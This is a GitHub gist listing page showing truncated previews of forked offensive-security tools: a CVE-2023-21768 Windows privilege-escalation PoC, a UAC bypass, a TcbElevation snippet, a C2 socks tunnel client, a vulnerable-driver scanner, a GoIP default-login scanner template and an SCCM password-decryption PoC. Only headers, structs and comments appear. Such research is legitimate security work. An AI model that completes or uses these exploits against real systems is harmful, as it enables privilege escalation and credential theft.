killvxk

@killvxk
killvxk / proxyconf.sh
Created November 17, 2023 16:51 — forked from dadevel/README.md
Proxychains Quick Config
set-proxy() {
    case "$#" in
        1)
            declare -r protocol=socks5
            declare -r host=127.0.0.1
            declare -r port="$1"
            ;;
        2)
            declare -r protocol="$1"
            declare -r host=127.0.0.1
@killvxk
killvxk / Exploit.c
Created November 16, 2023 05:07 — forked from D4m0n/Exploit.c
The Exploit PoC of CVE-2023-21768
#include "exploit.h"
#define AFD_NOTIFYSOCK_IOCTL 0x12127
typedef struct AFD_NOTIFYSOCK_DATA
{
    HANDLE hIoCompletionPort;     // 0x0
    PVOID registrationInfos;      // 0x8
    PVOID completionPortEntries;  // 0x10
    PVOID receivedEntryCount;     // 0x18 AAW target
#include "Windows.h"
#include "stdio.h"
#include "strsafe.h"
#include "winternl.h"
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION
{
    ULONG NumberOfProcessIdsInList;
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
/*
TaskManagerSecret
Author: @splinter_code
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
The core of this hack is stealing and using a token containing the UIAccess flag set.
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
From there it uses a task manager "feature" to run a new High IL cmd.exe.
This has been developed only for fun and shouldn't be used due to its high unreliability.
@killvxk
killvxk / drvscan.cpp
Created April 28, 2023 10:44 — forked from adrianyy/drvscan.cpp
vulnerable driver scanner
#include <string>
#include <vector>
#include <fstream>
#include <iostream>
#include <filesystem>
#include <Windows.h>
#include <winternl.h>
static_assert( sizeof( void* ) == 8 );
@killvxk
killvxk / Entry.c
Created April 10, 2023 13:43 — forked from realoriginal/Entry.c
TLDR: How a socks proxy client is written to tunnel connections from a 'teamserver' to an agent.
/*!
*
* RPROXICMP
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation Team
*
!*/
@killvxk
killvxk / goip-default-login.yaml
Created February 2, 2023 07:34 — forked from drfabiocastro/goip-default-login.yaml
GoIP GSM VoIP Gateway Default Password
id: goip-default-login
info:
  name: GoIP GSM VoIP Gateway Default Password
  author: drfabiocastro
  severity: high
  description: GoIP GSM VoIP Gateway Default Password, Allows attackers to send, receive sms and calls.
  reference:
    - http://en.dbltek.com/
    - https://medium.com/@hackatnow/how-to-create-a-python-script-to-find-goip-gsm-gateway-on-shodan-and-send-sms-ussd-via-goip-e2e203f5d339
@killvxk
killvxk / sccmdecryptpoc.cs
Created July 8, 2022 08:11 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
    internal class Program